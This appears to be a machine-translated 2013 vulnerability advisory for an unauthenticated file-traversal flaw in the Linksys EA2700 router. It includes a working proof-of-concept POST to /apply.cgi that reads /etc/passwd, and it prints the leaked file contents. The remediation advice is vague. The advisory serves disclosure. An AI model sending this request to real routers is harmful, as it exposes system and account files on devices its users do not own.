Linksys EA2700 arbitrary file traversal vulnerability-vulnerability warning-the black bar safety net

2013-04-09T00:00:00
ID MYHACK58:62201338208
Type myhack58
Reporter 佚名
Modified 2013-04-09T00:00:00

Description

Brief description:

This router software has never carried out security penetration testing, in the not logged in case you can easily get the router/etc/passwd file or other configuration file.

Detailed description:

This router software has never carried out security penetration testing, in the not logged in case you can easily get the router/etc/passwd file or other configuration file.

Vulnerability to prove:

POST /apply. cgi

Host: 192.168.1.1

submit_button=Wireless_Basic&change_action=gozila_cgi&next_page=/etc/passwd

====>

root:x:0:0::/:/bin/sh

nobody:x:9 9:9 9:Nobody:/:/bin/nologin

sshd:x:2 2:2 2::/var/empty:/sbin/nologin

admin:x:1 0 0 0:1 0 0 0:Admin User:/tmp/home/admin:/bin/sh

quagga:x:1 0 0 1:1 0 0 1:Quagga:/var/empty:/bin/nologin

firewall:x:1 0 0 2:1 0 0 2:Firewall:/var/empty:/bin/nologin

Repair solutions:

Notify the vendor of its routing software to rigorous security testing, and repair.